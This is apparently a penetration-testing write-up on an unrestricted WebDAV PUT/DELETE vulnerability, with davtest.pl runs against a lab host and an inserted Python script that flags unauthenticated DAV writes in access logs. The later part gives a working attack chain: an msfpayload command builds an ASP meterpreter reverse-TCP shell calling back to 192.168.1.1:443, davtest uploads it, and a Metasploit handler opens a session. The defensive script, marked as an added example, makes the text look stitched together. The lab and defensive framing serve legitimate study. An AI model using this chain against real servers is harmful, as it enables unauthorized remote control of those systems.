Unrestricted WebDAV PUT/DELETE Access
Severity: High - 8
CVSS Score: 9.4
PCI Score: 5
Description:
Unrestricted WebDAV requests expose a server to defacements and denial of service attacks. If the PUT method can be used by any unauthenticated remote user, arbitrary web pages can be inserted into the web root, or the disk can be filled with meaningless data; if the DELETE method is unprotected, then any file in a DAV-enabled directory can be removed at will.
Running a Nexpose scan against a vulnerable target gives an observation similar to the one below:
/r7.txt was successfully PUT on the server, then removed with DELETE.
We can use davtest.pl (http://code.google.com/p/davtest/) to validate whether the WebDAV setup on the target host is exploitable and, if so, to what extent.
lab@localhost:~/davtest-1.0$ ./davtest.pl
ERROR: Missing -url
./davtest.pl -url <url> [options]
-auth+ Authorization (user:password)
-cleanup delete everything uploaded when done
-directory+ postfix portion of directory to create
-debug+ DAV debug level 1-3 (2 & 3 log req/resp to /tmp/perldav_debug.txt)
-move PUT text files then MOVE to executable
-nocreate don't create a directory
-quiet only print out summary
-rand+ use this instead of a random string for filenames
-sendbd+ send backdoors:
auto - for any succeeded test
ext - extension matching file name(s) in backdoors/ dir
-uploadfile+ upload this file (requires -uploadloc)
-uploadloc+ upload file to this location/name (requires -uploadfile)
-url+ url of DAV location
Example: ./davtest.pl -url http://localhost/davdir
Test run against lab box:
lab@localhost:davtest-1.0# ./davtest.pl -url http://192.168.1.4 -directory demo_dir -rand rAnD0M5Tr1nG_upfileP0C -cleanup
********************************************************
Testing DAV connection
OPEN SUCCEED: http://192.168.1.4
********************************************************
NOTE Random string for this session: rAnD0M5Tr1nG_upfileP0C
********************************************************
Creating directory
MKCOL SUCCEED: Created http://192.168.1.4/demo_dir
********************************************************
Sending test files
PUT php SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.php
PUT asp SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.asp
PUT html SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.html
PUT shtml FAIL
PUT cgi FAIL
PUT txt SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.txt
PUT aspx FAIL
PUT cfm SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.cfm
PUT jsp SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.jsp
PUT pl FAIL
PUT jhtml SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.jhtml
********************************************************
Checking for test file execution
EXEC php FAIL
EXEC asp SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.asp
EXEC html SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.html
EXEC txt SUCCEED: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.txt
EXEC cfm FAIL
EXEC jsp FAIL
EXEC jhtml FAIL
********************************************************
Cleaning up
DELETE SUCCEED: http://192.168.1.4/demo_dir
********************************************************
./davtest.pl Summary:
Created: http://192.168.1.4/demo_dir
PUT File: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.php
PUT File: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.asp
PUT File: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.html
PUT File: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.txt
PUT File: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.cfm
PUT File: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.jsp
PUT File: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.jhtml
Executes: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.asp
Executes: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.html
Executes: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.txt
DELETED: http://192.168.1.4/demo_dir
davtest.pl confirms whether we can PUT arbitrary files on the web server, and which file types we can execute. As shown above, we can upload php, asp, html, txt, cfm, jsp and jhtml files. However, out of these, only the asp, html and txt files execute.
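The same MKCOL / PUT / DELETE sequence davtest produces is easy to spot from the server side. The following script is an added example, not part of the original post or of davtest: it parses constructed combined-format access log lines (the IPs, timestamps, user agents and the two-upload threshold are all assumed) and reports clients whose unauthenticated write-method requests succeeded or that uploaded executable file types.

```python
import posixpath
import re
from collections import defaultdict

# Constructed sample access log (combined format), not from the original post:
# an unauthenticated client runs the MKCOL / PUT / DELETE sequence davtest
# produces, while an authenticated user makes a legitimate PUT.
SAMPLE_LOG = """\
192.168.1.1 - - [10/Oct/2013:10:00:02 +0000] "MKCOL /demo_dir HTTP/1.1" 201 0 "-" "DAV.pm/v0.47"
192.168.1.1 - - [10/Oct/2013:10:00:03 +0000] "PUT /demo_dir/rAnD0M5Tr1nG_upfileP0C.php HTTP/1.1" 201 0 "-" "DAV.pm/v0.47"
192.168.1.1 - - [10/Oct/2013:10:00:03 +0000] "PUT /demo_dir/rAnD0M5Tr1nG_upfileP0C.asp HTTP/1.1" 201 0 "-" "DAV.pm/v0.47"
192.168.1.1 - - [10/Oct/2013:10:00:04 +0000] "PUT /demo_dir/rAnD0M5Tr1nG_upfileP0C.shtml HTTP/1.1" 403 0 "-" "DAV.pm/v0.47"
192.168.1.1 - - [10/Oct/2013:10:00:06 +0000] "DELETE /demo_dir HTTP/1.1" 204 0 "-" "DAV.pm/v0.47"
10.0.0.7 - alice [10/Oct/2013:10:05:00 +0000] "PUT /docs/report.txt HTTP/1.1" 201 0 "-" "Microsoft-WebDAV-MiniRedir/6.1"
10.0.0.9 - - [10/Oct/2013:10:06:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY"}
# Extensions davtest tries to PUT and then execute
EXEC_EXTS = {".php", ".asp", ".aspx", ".jsp", ".jhtml", ".cfm", ".cgi", ".pl", ".shtml"}

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return dict(m.groupdict(), status=int(m.group("status"))) if m else None

def unauthenticated_writes(lines):
    """(ip, method, path) for every successful write-method request with no auth user."""
    hits = []
    for rec in filter(None, map(parse_line, lines)):
        if rec["method"] in WRITE_METHODS and rec["user"] == "-" and 200 <= rec["status"] < 300:
            hits.append((rec["ip"], rec["method"], rec["path"]))
    return hits

def suspicious_clients(lines, min_exec_uploads=2):
    """Per client IP, list why its unauthenticated DAV activity looks like a probe or shell drop."""
    per_ip = defaultdict(lambda: {"methods": set(), "exec_uploads": 0})
    for ip, method, path in unauthenticated_writes(lines):
        per_ip[ip]["methods"].add(method)
        if method == "PUT" and posixpath.splitext(path)[1].lower() in EXEC_EXTS:
            per_ip[ip]["exec_uploads"] += 1
    flagged = {}
    for ip, info in per_ip.items():
        reasons = []
        if info["exec_uploads"] >= min_exec_uploads:
            reasons.append("%d executable file(s) PUT without auth" % info["exec_uploads"])
        if {"PUT", "DELETE"} <= info["methods"]:
            reasons.append("unauthenticated PUT and DELETE both succeeded (scanner probe pattern)")
        if reasons:
            flagged[ip] = reasons
    return flagged
```

Feed the output of `suspicious_clients(open("access.log"))` to whatever alerting you use; the 403 on the .shtml PUT is deliberately not counted, so only writes the server actually accepted raise a flag.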
This davtest summary can be sufficient evidence of the vulnerability. In a pentest, however, you may face a scenario where the target host is otherwise locked down and only a web server is running on 80/tcp. Then exploiting this vulnerability becomes significant, and we need to go beyond the davtest summary.
So what can we do from here? The obvious task is to upload a control mechanism to the target server. That is, we upload a web shell, for example an asp shell, via PUT, and then simply call it and play with the server.
You can find a lot of web shells with some google-fu, or you can write one yourself. Alternatively, we can generate a shell payload using msfpayload.
lab@localhost:davtest-1.0# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R | msfencode -t asp -o aspmetrev443t.asp
Then, use davtest.pl to upload it.
lab@localhost:davtest-1.0# ./davtest.pl -url http://192.168.1.4 -directory demo_dir -uploadfile aspmetrev443t.asp -uploadloc demo_dir
Upload succeeded: http://192.168.1.4/demo_dir/aspmetrev443t.asp
Before you access this URL, make sure you start the Metasploit multi handler to listen for the incoming connection from the meterpreter reverse shell payload.
msf-pro >
msf-pro > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.1
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.1:443
[*] Starting the payload handler...
With everything set up now, browse to your shell aspmetrev443t.asp.
[*] Sending stage (748032 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.4:443 -> 192.168.1.1:56031)
+++++
Win!